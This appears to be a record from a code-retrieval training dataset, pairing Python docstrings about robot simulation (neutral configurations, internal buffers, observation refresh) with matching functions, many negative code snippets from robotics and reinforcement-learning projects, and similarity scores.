QgsMessageLog.logMessage(error_message, level=Qgis.Info)\n self._warning_message.append(f\"Info: {error_message}\")\n\n time_of_day = \"2020-10-23T06:00:00\"\n time_animation = \"false\"\n cloud_state = \"free\"\n fog_range = \"100000\"\n sun_intensity = \"0.85\"\n sun_azimuth = \"0\"\n sun_elevation = \"1.31\"\n percip_type = \"dry\"\n percip_intensity = \"0\"\n\n global_act = etree.SubElement(init_act, \"GlobalAction\")\n env_act = etree.SubElement(global_act, \"EnvironmentAction\")\n environ = etree.SubElement(env_act, \"Environment\")\n environ.set(\"name\", \"Environment1\")\n\n env_time = etree.SubElement(environ, \"TimeOfDay\")\n env_time.set(\"animation\", time_animation)\n env_time.set(\"dateTime\", time_of_day)\n\n weather = etree.SubElement(environ, \"Weather\")\n weather.set(\"cloudState\", cloud_state)\n weather_sun = etree.SubElement(weather, \"Sun\")\n weather_sun.set(\"intensity\", sun_intensity)\n weather_sun.set(\"azimuth\", sun_azimuth)\n weather_sun.set(\"elevation\", sun_elevation)\n weather_fog = etree.SubElement(weather, \"Fog\")\n weather_fog.set(\"visualRange\", fog_range)\n weather_percip = etree.SubElement(weather, \"Precipitation\")\n weather_percip.set(\"precipitationType\", percip_type)\n weather_percip.set(\"intensity\", percip_intensity)\n\n env_road = etree.SubElement(environ, 
\"RoadCondition\")\n env_road.set(\"frictionScaleFactor\", \"1.0\")", "def action_space(self) -> gym.spaces.Dict:\n return gym.spaces.Dict(\n throttle=gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n steer=gym.spaces.Box(\n low=-1.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n brake=gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(),\n dtype=np.float32,\n ),\n )", "def apply_action(self, action):\n robot_state = self.get_state('turtlebot3_waffle_pi','world')\n robot_x = robot_state.pose.position.x\n robot_y = robot_state.pose.position.y\n # Set the distance moved in an action such that it is at least as large as the\n # minimum distance that would let a robot in the middle of the goal go to either side\n #self.move_dist = max(((C.GOAL_TOP + C.GOAL_BOTTOM) / 2) / C.NUM_POS_SENDS, 0.5)\n if action == Learn.MOVE_LEFT:\n print(\"Move left\")\n self.set_robot(robot_x, robot_y+self.move_dist)\n elif action == Learn.MOVE_RIGHT:\n print(\"Move right\")\n self.set_robot(robot_x, robot_y-self.move_dist)\n else:\n print(\"Stay put\")", "def __init__(self, env, dim_permutation=[0,1,2]):\n super().__init__(env)\n self.dim_permutation = dim_permutation\n old_shape = np.array(self.observation_space.shape)\n new_space = gym.spaces.Box(\n low=0,\n high=255,\n shape=old_shape[dim_permutation],\n dtype=np.uint8,\n )\n self.observation_space = new_space", "def action_space(self, curr_state):\n # Action space - allowed (position, value) combinations for the agent and environment given the current state\n\n agent_actions = list(product(self.allowed_positions(curr_state), self.allowed_values(curr_state)[0]))\n env_actions = list(product(self.allowed_positions(curr_state), self.allowed_values(curr_state)[1]))\n return (agent_actions, env_actions)" ]
[ "0.6897351", "0.6872064", "0.6778322", "0.6433614", "0.62521344", "0.6221735", "0.61467814", "0.6123499", "0.61089486", "0.60900205", "0.60286", "0.60075194", "0.5947461", "0.5933904", "0.5894918", "0.58863795", "0.584985", "0.57926476", "0.5792396", "0.57770336", "0.57563627", "0.5688972", "0.56786484", "0.5657426", "0.5656682", "0.5653684", "0.5643079", "0.5637894", "0.56307846", "0.56233114" ]
0.706857
0
Returns a valid neutral configuration for the robot. The default implementation returns the neutral configuration if it is valid, and the "mean" configuration otherwise (right in the middle of the lower and upper position bounds).
def _neutral(self) -> np.ndarray:
    # Get the neutral configuration of the actual model
    qpos = neutral(self.robot.pinocchio_model)

    # Make sure it is not out-of-bounds
    position_limit_lower = self.robot.position_limit_lower
    position_limit_upper = self.robot.position_limit_upper
    for idx, val in enumerate(qpos):
        lo, hi = position_limit_lower[idx], position_limit_upper[idx]
        if hi < val or val < lo:
            qpos[idx] = 0.5 * (lo + hi)

    # Return rigid/flexible configuration
    if self.simulator.use_theoretical_model:
        return qpos[self.robot.rigid_joints_position_idx]
    return qpos
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_default_config(self):\n \n config = {}\n \n # default z_0_hat, zeros, flexible\n config['z_0_hat_option'] = 'flexible'\n config['initial_z_0_hat'] = np.zeros(self.dimension)\n \n # default P_0_hat, identity times a small scalar, flexible\n config['P_0_hat_option'] = 'flexible'\n config['initial_P_0_hat'] = 0.1 * np.eye(self.dimension)\n \n # default A, identity, flexible\n config['AB_option'] = 'flexible'\n config['initial_A'] = np.eye(self.dimension)\n config['initial_B'] = np.zeros((self.dimension, self.control_dimension))\n \n # default Q, identity times a small scalar, flexible\n config['Q_option'] = 'flexible'\n config['initial_Q'] = 0.1 * np.eye(self.dimension)\n \n # default R, identity times a small scalar, flexible\n config['R_option'] = 'flexible'\n config['initial_R'] = 0.1 * np.eye(self.dimension)\n \n # default stopping criteria, threshold 1e-5, num_iterations 1000\n # stop whenever either of the two critieria is reached\n config['threshold'] = 1e-5\n config['num_iterations'] = 1000\n\n return config", "def get_default_configuration():\n # Pre-configured default values for various parameters:\n default_config = {\n \"name\":\"Transient\",\n \"auto\":True,\n \"ra\":0.0,\n \"dec\":0.0,\n \"radius\":10.0,\n \"resolution\":1.8,\n \"energy\":70.0,\n \"pixsize\": 16,\n \"respcode\":\"czti_Aepix.out\",\n \"txycode\":\"radec2txty.out\",\n \"resppath\":\"pixarea\",\n \"plotfile\":\"plots/localize.pdf\",\n\t \"lc_bin\":5.0,\n\t \"typ\":\"band\",\n\t \"comp_bin\":20,\t\n \"verbose\":True,\n \"do_fit\":True\n }\n required_config = {\n 'l2file':\"_level2.evt\",\n 'infile':\"file.evt\",\n 'mkffile':\"file.mkf\",\n 'trigtime':0.00,\n 'transtart':0.00,\n 'tranend':0.00,\n 'bkg1start':0.00,\n 'bkg1end':0.00,\n 'bkg2start':0.00,\n 'bkg2end':0.00,\n\t 'alpha':0.00,\n\t 'beta':0.00,\n\t 'E0':0.00,\n\t 'A':0.00\n }\n return default_config, required_config", "def default_config(cls):\n return {\n \"observation\": {\n \"type\": \"TimeToCollision\"\n },\n \"policy_frequency\": 1, # [Hz]\n \"other_spacecrafts_type\": \"space_env.spacecraft.behavior.IDMspacecraft\",\n \"screen_width\": 600, # [px]\n \"screen_height\": 600, # [px]\n \"centering_position\": [0.3, 0.5],\n \"show_trajectories\": False\n }", "def antenny_config_load_default(self):\n return self.antenny_config.load_default_config()", "def _GetDefaultConfig(self) -> str:\n try:\n region = util.GetRegionFromZone(\n FLAGS.zones[0] if FLAGS.zones else FLAGS.zone[0])\n except IndexError:\n region = _DEFAULT_REGION\n return f'regional-{region}'", "def default_config():\n return {'grid': {'regular': {'width': 0.05,\n 'wake': {'width': 0.1, 'progression': None},\n 'layers': 50,\n 'thickness': 5,\n 'boundary_layer': { 'initial_thickness': 4.2e-5 }}}}", "def default_config(cls) -> dict:\n return {\n \"observation\": {\n \"type\": \"Kinematics\"\n },\n \"action\": {\n \"type\": \"DiscreteMetaAction\"\n },\n \"simulation_frequency\": 15, # [Hz]\n \"policy_frequency\": 1, # [Hz]\n \"other_vehicles_type\": \"highway_env.vehicle.behavior.IDMVehicle\",\n \"screen_width\": 600, # [px]\n \"screen_height\": 150, # [px]\n \"centering_position\": [0.3, 0.5],\n \"scaling\": 5.5,\n \"show_trajectories\": False,\n \"render_agent\": True,\n \"offscreen_rendering\": os.environ.get(\"OFFSCREEN_RENDERING\", \"0\") == \"1\",\n \"manual_control\": False,\n \"real_time_rendering\": False\n }", "def antenny_config_make_default(self):\n return self.antenny_config.save_as_default_config()", "def stand_alone_config(self) -> 
Optional['outputs.CSIPowerMaxRevProxySpecConfigStandAloneConfig']:\n return pulumi.get(self, \"stand_alone_config\")", "def default_setting(self):\n\t\tdo_log = False if self.debug else True\n\t\tdo_validation, do_summary = False, False\n\t\tlog_step = 2\n\t\tepochs = 50\n\t\tvali_k = 5\n\n\t\t'''on the usage of mask_label\n\t\t(1) given a supervised dataset, True means that mask a supervised data to mimic unsupervised data\n\t\t(2) given an unsupervised dataset, this setting is not supported, since it is already an unsupervised data\n\t\t'''\n\t\tmask_label = False\n\t\tif mask_label:\n\t\t\tassert not self.data_id in MSLETOR_SEMI\n\t\t\tmask_ratio = 0.1\n\t\t\tmask_type = 'rand_mask_rele'\n\t\telse:\n\t\t\tmask_ratio = None\n\t\t\tmask_type = None\n\n\t\t# more evaluation settings that are rarely changed\n\t\tself.eval_dict = dict(debug=self.debug, grid_search=False, dir_output=self.dir_output,\n\t\t\t\t\t\t cutoffs=[1, 3, 5, 10, 20, 50], do_validation=do_validation, vali_k=vali_k,\n\t\t\t\t\t\t do_summary=do_summary, do_log=do_log, log_step=log_step, loss_guided=False, epochs=epochs,\n\t\t\t\t\t\t mask_label=mask_label, mask_ratio=mask_ratio, mask_type=mask_type)\n\n\t\treturn self.eval_dict", "def default_config(self) -> Optional['outputs.FeatureSpecFleetobservabilityLoggingConfigDefaultConfig']:\n return pulumi.get(self, \"default_config\")", "def default(self):\n return self._configs[0] if len(self._configs) else None", "def _expected_config(self) -> Dict[str, Optional[str]]:\n return EXPECTED_CONFIG", "def _expected_config(self) -> Dict[str, Optional[str]]:\n return EXPECTED_CONFIG", "def get_moving_average_configuration(self):\n return GetMovingAverageConfiguration(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_MOVING_AVERAGE_CONFIGURATION, (), '', 'H H'))", "def random_configuration(self):\n raise NotImplementedError", "def test_no_default(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_config(\n self._cmd_args,\n imageroller.test.get_config_parser(self._no_default))\n # ConcurrentWorkers is the first value that is checked\n self.assertEqual(str(cm.exception),\n \"Config must contain ConcurrentWorkers\")", "def _default_config(self):\n return {\n 'penalty': 'l1',\n 'solver': 'liblinear'\n }", "def get_default_evaluator(self) -> EvaluatorConfig:\n raise NotImplementedError()", "def _getDefaultSettings(cls):\n return {'minimumROIDimensions': 1,\n 'minimumROISize': None, # Skip testing the ROI size by default\n 'normalize': False,\n 'normalizeScale': 1,\n 'removeOutliers': None,\n 'resampledPixelSpacing': None, # No resampling by default\n 'interpolator': 'sitkBSpline', # Alternative: sitk.sitkBSpline,\n 'padDistance': 5,\n 'distances': [1],\n 'force2D': False,\n 'force2Ddimension': 0,\n 'label': 1,\n 'enableCExtensions': True,\n 'additionalInfo': True}", "def clean_conf(self):\r\n return self._arm.clean_conf()", "def _config_min(self):\n self.cntrl[\"imin\"] = 1\n self.cntrl[\"ntx\"] = 1\n self.cntrl[\"irest\"] = 0\n self.cntrl[\"maxcyc\"] = 5000\n self.cntrl[\"ncyc\"] = 1000\n self.cntrl[\"dt\"] = 0.0\n self.cntrl[\"nstlim\"] = 0\n self.cntrl[\"ntpr\"] = 100\n self.cntrl[\"ntwr\"] = 5000\n self.cntrl[\"ntwx\"] = 0\n self.cntrl[\"ntwe\"] = 0\n self.cntrl[\"ntxo\"] = 1\n self.cntrl[\"ntf\"] = 1\n self.cntrl[\"ntc\"] = 1\n self.cntrl[\"ntt\"] = 0\n self.cntrl[\"gamma_ln\"] = 0.0\n self.cntrl[\"ig\"] = 0\n self.cntrl[\"ntp\"] = 0\n self.cntrl[\"barostat\"] = 0\n self.mdcrd = None\n self.mden = None", "def default(cls) -> 'Config':\n parser: 
configparser.ConfigParser = configparser.ConfigParser()\n parser.read_dict(dict(wpwatcher=Config.DEFAULT_CONFIG))\n return cls.fromparser(parser)", "def getDefaultConfig():\n config = {\n \"samples\": _DEFAULT_SAMPLE_COUNT,\n \"channel\": \"all\",\n \"rate\": _DEFAULT_SAMPLE_RATE,\n \"update\": 1,\n \"output\": \"data.rld\",\n \"format\": \"rld\",\n \"size\": _DEFAULT_FILE_SIZE,\n \"comment\": _DEFAULT_FILE_COMMENT,\n \"digital\": True,\n \"ambient\": False,\n \"aggregate\": \"downsample\",\n \"high-range\": [],\n \"web\": False,\n }\n return config", "def default_if_not_defined(cls, tolerates=None):\n if tolerates is None:\n return cls.default()\n else:\n return tolerates", "def empty_geno_from_cfg(cfg: Config):\n\n return from_ratios(cfg.initial_genetic_ratios)", "def metrics_defaults(self) -> Tuple[float, ...]:\n return (\n MIN_AP,\n self.tp_threshold_m,\n MAX_NORMALIZED_ASE,\n MAX_YAW_RAD_ERROR,\n MIN_CDS,\n )", "def get_default_config():\n # pylint: disable=cyclic-import\n from raylab.agents.sac import DEFAULT_CONFIG\n\n return DEFAULT_CONFIG", "def imu_load_default(self):\n return self.imu_config.load_default_config()", "def antenny_config_reset(self):\n return self.antenny_config.reset_default_config()" ]
[ "0.57778156", "0.55688155", "0.5520987", "0.54586405", "0.5457967", "0.54159516", "0.53503996", "0.5339682", "0.52812344", "0.5193692", "0.5190576", "0.51527995", "0.5146403", "0.5146403", "0.51304436", "0.5123697", "0.51159203", "0.5101688", "0.5077906", "0.5066523", "0.50080395", "0.4988228", "0.49872074", "0.4983842", "0.49663815", "0.49592578", "0.4916013", "0.48883277", "0.48750326", "0.486934" ]
0.6328567
0
Initialize internal buffers for fast access to shared memory or to avoid redundant computations.
def _initialize_buffers(self) -> None:
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _initialize_mem_buffs():\r\n args = get_args()\r\n\r\n # Initialize memory for checkpointed activations.\r\n if args.distribute_checkpointed_activations:\r\n mpu.init_checkpointed_activations_memory_buffer()\r\n mpu.init_workspace_memory_buffer()\r\n # mpu.init_forward_buffer()\r\n mpu.init_QKV_forward_buffer()\r\n mpu.init_QKV_dense_buffer()\r\n mpu.init_h4h_forward_buffer()\r\n mpu.init_fhh_forward_buffer()\r\n mpu.init_backward_buffer()\r\n mpu.init_parameter_gradient_buffer()\r\n mpu.init_conjunction_gradient_buffer()\r\n # if not args.ParallelTransformer_only:\r\n # mpu.init_lmhead_dense_buffer()", "def create_buffers(self):", "def init_buffer(self):\n \n self.shape.buf = [pi3d.Buffer(self.shape, self.verts, self.texcoords, self.inds, self.norms)]\n self.shape.set_draw_details(self.shader, [self.spritesheet.img])", "def __init__(self, buffer_size=3000):\n self.buffer = []\n self.buffer_size = buffer_size", "def __init__(self, buffer_size=3000):\n self.buffer = []\n self.buffer_size = buffer_size", "def _allocate_buffer_memory(self):\n for channel in self._channels_dict.values():\n if channel.enabled:\n channel.allocate(self._num_captures, self._num_samples)", "def fillBuffer():\n buff[bufferCounter].next = dataIn", "def __init__(self, memset_0=False):\r\n self.memset_0 = memset_0", "def __init__(self, buffer_size: int, batch_size: int):\n self.buffer: list = list()\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.idx = 0", "def __init__(self):\n self.buffer = bytearray()", "def __setstate__(self, state):\n shape = state['_DoubleBufferedSharedNumpyArray__np_array1'].shape\n dtype = state['_DoubleBufferedSharedNumpyArray__np_array1'].dtype\n type_id = np_type_id_to_ctypes(dtype)\n self.__shared1 = RawArray(type_id, np.product(shape))\n self.__np_array1 = np.frombuffer(self.__shared1, dtype=dtype).reshape(shape)\n np.copyto(self.__np_array1, state['_DoubleBufferedSharedNumpyArray__np_array1'])\n self.__shared2 = RawArray(type_id, np.product(shape))\n self.__np_array2 = np.frombuffer(self.__shared2, dtype=dtype).reshape(shape)\n np.copyto(self.__np_array2, state['_DoubleBufferedSharedNumpyArray__np_array2'])\n self.__parity = state['_DoubleBufferedSharedNumpyArray__parity']", "def __init__(self):\n\t\tself.dataMemory = sysv_ipc.SharedMemory(65)\n\t\tself.statusMemory = sysv_ipc.SharedMemory(88)\n\t\treturn", "def buf_init(self):\n self.buffer = []\n for _ in range(1000):\n hash_str = '{}{}'.format(self.salt, self.forward_idx).encode()\n self.buffer.append(md5(hash_str).hexdigest())\n self.forward_idx += 1", "def re_init_buffer(self):\n #~ print(self.verts)\n #~ print(self.texcoords)\n #~ print(self.inds)\n self.shape.buf[0].re_init(pts=np.array(self.verts, 'f'),texcoords=np.array(self.texcoords, 'f'))", "def _init(self):\n self._nfields = 0\n self._converted = {}\n self._heapoffset = 0\n self._heapsize = 0\n self._col_weakrefs = weakref.WeakSet()\n self._coldefs = None\n self._gap = 0\n self._uint = False", "def __init__(self, *args):\n _snap.TMem_swiginit(self, _snap.new_TMem(*args))", "def _refresh_buffers(self) -> None:", "def prepareUniformBuffers(self):\n # Vertex shader uniform buffer block\n uboVSSize = sum([glm.sizeof(ubo) for ubo in self.uboVS.values()])\n bufferInfo = vk.VkBufferCreateInfo(\n sType = vk.VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO,\n size = uboVSSize,\n # This buffer will be used as a uniform buffer\n usage = vk.VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT\n )\n # Create a new buffer\n self.uniformBufferVS['buffer'] = vk.vkCreateBuffer(self.device, 
bufferInfo, None)\n # Get memory requirements including size, alignment and memory type\n memReqs = vk.vkGetBufferMemoryRequirements(self.device, self.uniformBufferVS['buffer'])\n # Get the memory type index that supports host visibile memory access\n # Most implementations offer multiple memory types and selecting the correct one to allocate memory from is crucial\n # We also want the buffer to be host coherent so we don't have to flush (or sync after every update.\n #Note: This may affect performance so you might not want to do this in a real world application that updates buffers on a regular base\n allocInfo = vk.VkMemoryAllocateInfo(\n sType = vk.VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO,\n pNext = None,\n allocationSize = memReqs.size,\n memoryTypeIndex = self.vulkanDevice.getMemoryType(memReqs.memoryTypeBits, vk.VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | vk.VK_MEMORY_PROPERTY_HOST_COHERENT_BIT)\n )\n # Allocate memory for the uniform buffer\n self.uniformBufferVS['memory'] = vk.vkAllocateMemory(self.device, allocInfo, None)\n # Bind memory to buffer\n vk.vkBindBufferMemory(self.device, self.uniformBufferVS['buffer'], self.uniformBufferVS['memory'], 0)\n # Store information in the uniform's descriptor that is used by the descriptor set\n self.uniformBufferVS['descriptor'] = vk.VkDescriptorBufferInfo(\n buffer = self.uniformBufferVS['buffer'],\n offset = 0,\n range = uboVSSize\n )\n\n self.updateUniformBuffers()", "def init_batch(self):\n pass", "def fill_buffer(self):\n num_of_smp = 0\n while num_of_smp < self.buf_size:\n c, t = self.inlet.pull_chunk(timeout=0.0)\n new_c = []\n new_t = []\n while c:\n new_c += c\n new_t += t\n c, t = self.inlet.pull_chunk(timeout=0.0)\n\n # add samples to buffer\n if any(new_c):\n # add samples\n num_of_smp += len(new_c)\n data_v = [item for sublist in new_c for item in sublist]\n self.gbuffer = np.roll(self.gbuffer, -len(data_v))\n self.gbuffer[-len(data_v):] = data_v\n # add timestamps\n if new_t:\n self.gtimes = np.roll(self.gtimes, -len(new_t))\n self.gtimes[-len(new_t):] = new_t", "def initialize(self):\r\n self.bucket_array.initialize()", "def __init__(self):\n self.mem = [0] * 256\n self.pc = 0\n self.running = False", "def __init__(self, init_size=31):\n self.keys = build_array(init_size) # Parallel arrays - key[]\n self.values = build_array(init_size) # Parallel arrays - values[]\n self.size = init_size\n self.count = 0\n # Task3 counters\n self.count_collisions = 0\n self.total_probe_length = 0\n self.count_rehashes = 0\n self.longest_probe_chain = 0", "def initBuffer(self, env):\n cnt = 0\n while len(self.memory) < self.memory.capacity:\n cnt += 1\n print(\"\\rWarmup Buffer [{:d}]\".format(cnt), end=\"\")\n s = env.reset()\n actionIdx, actionIdxTuple = self.select_action(s, explore=True)\n s_, r, done, info = env.step(actionIdxTuple)\n self.store_transition(s, actionIdx, r, s_, info)\n print(\"\\n => Warmup Buffer Ends\")", "def create_buf(self, num_bytes, cacheable = 0):\n if self.buf is None:\n self.buf = libxlnk.cma_alloc(num_bytes, cacheable)\n if self.buf == ffi.NULL:\n raise RuntimeError(\"Memory allocation failed.\")\n else:\n libxlnk.cma_free(self.buf)\n self.buf = libxlnk.cma_alloc(num_bytes, cacheable)\n bufPhyAddr = libxlnk.cma_get_phy_addr(self.buf)\n self._bufPtr = ffi.cast(\"uint32_t *\",bufPhyAddr)\n self.bufLength = num_bytes", "def initialize(self):\n self.initilize_multiply_array() # m\n self.initialize_cameras()\n self.initialize_electronics()\n self.logger.info('Starting free runs and continuous reads')\n 
self.camera_microscope.start_free_run()\n self.camera_microscope.continuous_reads()\n self.camera_fiber.start_free_run()\n self.camera_fiber.continuous_reads()\n self.servo_off()\n\n time.sleep(1) #m Without the sleep below initialize_multiply_array does not work", "def memb_init(self):\n self.initialize()", "def _real_initialize(self):\n pass", "def __init__(self, buffer_size, random_seed=None):\n self.buffer_size = buffer_size\n self.count = 0\n self.oldPos = 0\n self.currPos = 0\n self.full = False\n self.buffer = []\n self.featCount = 3\n random.seed(random_seed)\n self.useSubBuffer = False", "def initialize(self):\n self.keys = [None] * BUCKET_SIZE\n self.values = [None] * BUCKET_SIZE" ]
[ "0.7599487", "0.6695344", "0.65703356", "0.6390197", "0.6390197", "0.63680345", "0.6328434", "0.6325463", "0.63085467", "0.6209726", "0.62017787", "0.6195051", "0.6174428", "0.6082165", "0.6043059", "0.6028242", "0.5996737", "0.5959481", "0.5930883", "0.5913184", "0.5906563", "0.58759105", "0.5856205", "0.58493775", "0.58155644", "0.5812441", "0.58085245", "0.5801125", "0.5788991", "0.57766575" ]
0.8179772
0
Refresh internal buffers that must be updated manually.
def _refresh_buffers(self) -> None:
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh(self) -> None:\n if self._is_buffer_full():\n self.stream.close()\n self._open_stream() # re-initial self.stream\n self._buffer = bytearray()\n self._buffer_pointer = -1", "def update(self):\n # pull all available chunks\n c, t = self.inlet.pull_chunk(timeout=0.0)\n new_c = []\n new_t = []\n while c:\n new_c += c\n new_t += t\n c, t = self.inlet.pull_chunk(timeout=0.0)\n\n # add samples to buffer\n if any(new_c):\n # add samples\n data_v = [item for sublist in new_c for item in sublist]\n self.gbuffer = np.roll(self.gbuffer, -len(data_v))\n self.gbuffer[-len(data_v):] = data_v\n # add timestamps\n if new_t:\n self.gtimes = np.roll(self.gtimes, -len(new_t))\n self.gtimes[-len(new_t):] = new_t\n\n # update graph handles\n if self.gbuffer.any():\n for k in range(0, self.channel_count):\n self.handles[k].setData(self.gtimes,\n self.gbuffer[k::self.channel_count])", "def _buffer_all(self):\n self._buffer()", "def refresh(self):\n self.__refresh()", "def _flush_buffer(self):\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self):\n pass", "def refresh(self):\n pass", "def refresh_memory(self):\n if not self.reader:\n self.model.data = None\n self.model.mask = None\n return\n\n memory = self.reader.get_memory(self.model.address, self.model.data_size)\n\n self.model.data = memory.data\n self.model.mask = memory.mask\n self.model.delta = self.reader.delta\n\n if self.view:\n self.view.refresh()", "def refresh(self):\n raise NotImplementedError", "def refresh(self):\n raise NotImplementedError", "def refresh(self):\r\n # todo, use vid_info as property instead of this\r\n # reset properties and rebuild streams\r\n self.setup()", "def clear_buffers(self):\n self.m_param = [\"\" for x in range(self.NUM_BUFFERS + 1)]\n return", "def reload(self,offline_buffer):\n #loading online buffer from offline buffer by sampling (online_buffer.buffer_size) samples \n self.buffer = SumTree(self.buffer_size)\n names, idxs = offline_buffer.sample_batch(self.buffer_size)\n self.offline_idxs = idxs\n state , action , reward, done = data_handler.handler.fetch_single_image(directory = self.directory, branch_name = self.name, observation_name = names[0])\n #loop on names and load in the online buffer\n for i in range(len(names)-1):\n next_state , next_action , next_reward , done = data_handler.handler.fetch_single_image(directory = self.directory, branch_name = self.name, observation_name = names[i+1])\n #done = 0\n self.memorize(state, action, reward, done, next_state, error=[1])\n state , action , reward = next_state , next_action , next_reward", "def updateGraphs(self):\n # first update all three buffers\n tuiBufferName = self.dataClient.recv() # receive 'error'\n while tuiBufferName != 'end buffers':\n tuiData = self.dataClient.recv()\n self.logger.debug(f'Appending {tuiData} to buffer {tuiBufferName}')\n\n if(tuiBufferName == 'error'):\n self.model.errorBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'output'):\n self.model.outputBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'reference'):\n self.model.referenceBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'output-error'):\n self.model.errorPercentage = tuiData.flat[0]\n\n tuiBufferName = self.dataClient.recv()", "def refresh(self):\n raise NotImplementedError(\"To be implemented\")", "def sync_buffers(self, model: nn.Module) -> None:\n # if not update buffer, copy buffer from orig model\n if self.update_buffers:\n 
warnings.warn(\n '`update_buffers` is set to True in this ema model, and '\n 'buffers will be updated in `update_parameters`.')\n\n avg_buffer = itertools.chain(self.module.buffers())\n orig_buffer = itertools.chain(model.buffers())\n for b_avg, b_orig in zip(avg_buffer, orig_buffer):\n b_avg.data.copy_(b_orig.data)", "def sync_buffers(self, model: nn.Module) -> None:\n # if not update buffer, copy buffer from orig model\n if self.update_buffers:\n warnings.warn(\n '`update_buffers` is set to True in this ema model, and '\n 'buffers will be updated in `update_parameters`.')\n\n avg_buffer = itertools.chain(self.module.buffers())\n orig_buffer = itertools.chain(model.buffers())\n for b_avg, b_orig in zip(avg_buffer, orig_buffer):\n b_avg.data.copy_(b_orig.data)", "def _buffer_flush(self, event):\n self._out_buffer_lock.acquire()\n _out_buffer = self._out_buffer\n self._out_buffer = []\n self._out_buffer_lock.release()\n self.write(''.join(_out_buffer), refresh=False)", "def reset_local_buffers(self) -> None:\n for buf in self.values():\n buf.reset_agent()", "def swap_buffers(self):\n raise NotImplementedError()", "def reset(self):\n\t\tself.buf = []", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def refresh(self):\n self.Refresh()", "def force_update(self):\n self.update(self.poll())", "def Refresh(self):\n pass", "def _Refresh(self):\n raise NotImplementedError", "def re_init_buffer(self):\n #~ print(self.verts)\n #~ print(self.texcoords)\n #~ print(self.inds)\n self.shape.buf[0].re_init(pts=np.array(self.verts, 'f'),texcoords=np.array(self.texcoords, 'f'))" ]
[ "0.7515545", "0.6998398", "0.67986554", "0.67475444", "0.6732874", "0.66470855", "0.66470855", "0.66470855", "0.6610883", "0.6610883", "0.65877867", "0.6537833", "0.6537833", "0.6537378", "0.65073454", "0.64904463", "0.6455442", "0.6443124", "0.6428215", "0.6428215", "0.6427254", "0.63940394", "0.63810223", "0.63764644", "0.63625777", "0.63186866", "0.6291628", "0.6284781", "0.62824017", "0.6233018" ]
0.88663775
0
Compute the observation based on the current state of the robot. In practice, it updates the internal buffer directly for the sake of efficiency. By default, it sets the observation to the value of the measurement, which would not work unless `ObsT` corresponds to `EngineObsType`.
def refresh_observation(self, measurement: EngineObsType) -> None:
    observation = self.observation
    observation["t"][()] = measurement["t"]
    _array_copyto(observation['states']['agent']['q'],
                  measurement['states']['agent']['q'])
    _array_copyto(observation['states']['agent']['v'],
                  measurement['states']['agent']['v'])
    sensors_data = observation['measurements']
    for key, value in dict.items(measurement['measurements']):
        _array_copyto(sensors_data[key], value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_observation(self):\n robotPos, robotOrn = p.getBasePositionAndOrientation(self.botId)\n robotEuler = p.getEulerFromQuaternion(robotOrn)\n linear, angular = p.getBaseVelocity(self.botId)\n return (np.array([robotEuler[0],angular[0],self.vt], dtype='float32'))", "def take_observation(self):\n # Take an observation\n rclpy.spin_once(self.node)\n obs_message = self._observation_msg\n\n # Check that the observation is not prior to the action\n if obs_message is not None:\n msg_time = self.get_time_from_time_msg(obs_message.header.stamp)\n else:\n msg_time = -1\n\n while obs_message is None or msg_time < self.last_action_send_time:\n if obs_message is not None:\n if msg_time < self.last_action_send_time:\n print(\"observation outdated, msg time: %d, last action send time: %d\" % (\n msg_time, self.last_action_send_time))\n # print(\"Sec: %d\" % self._observation_msg.header.stamp.sec)\n # print(\"Nsec: %d\" % self._observation_msg.header.stamp.nanosec) \n # else:\n # print(\"I am in obs_message is none\")\n rclpy.spin_once(self.node)\n obs_message = self._observation_msg\n\n if obs_message is not None:\n msg_time = self.get_time_from_time_msg(obs_message.header.stamp)\n else:\n msg_time = -1\n\n # print(\"Observation taken!\")\n lastObservations = ut_biped.processObservations(obs_message, self.environment)\n # lastImuData = self._imu_msg\n # Set observation to None after it has been read.\n self._observation_msg = None\n\n state = np.r_[np.reshape(lastObservations, -1)]\n\n return state", "def calc_observation(self, t, x, u):\n return", "def calc_observation(self, t, x, u):\n return", "def _get_obs(self):\n full_state = np.copy(self.state)\n if full_state[self.bot_y, self.bot_x] != self.TileState.DIRTY.value:\n full_state[self.bot_y, self.bot_x] = self.TileState.BOT.value\n return full_state", "def update_state(self, a, obs, t):\n \n self.update_weights(a, obs, t) # only update weights, not particles \n self.update_running_average_weights(t) \n return None", "def _get_obs(self):\n return self.observation_function[self.cur_state]", "def update(self, state_value, current_time):\r\n\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\r\n\t\tself.current_time = current_time/1000.0 \t\t# Converting from msec to sec\r\n\t\tdelta_time = self.Ts\r\n\t\tdelta_error = error - self.last_error\r\n\r\n\t\tself.ITerm += error * delta_time\r\n\t\t\r\n\t\tself.DTerm = 0.0\r\n\t\tif delta_time > 0:\r\n\t\t\tself.DTerm = delta_error / delta_time\r\n\r\n\t\t# Remember last time and last error for next calculation\r\n\t\tself.last_time = self.current_time\r\n\t\tself.last_error = error\r\n\t\t\r\n\t\t# Calculate u(t) - catch potential division by zero error\r\n\t\ttry:\r\n\t\t\tu = self.Kp * (error + ((1.0/self.Ti) * 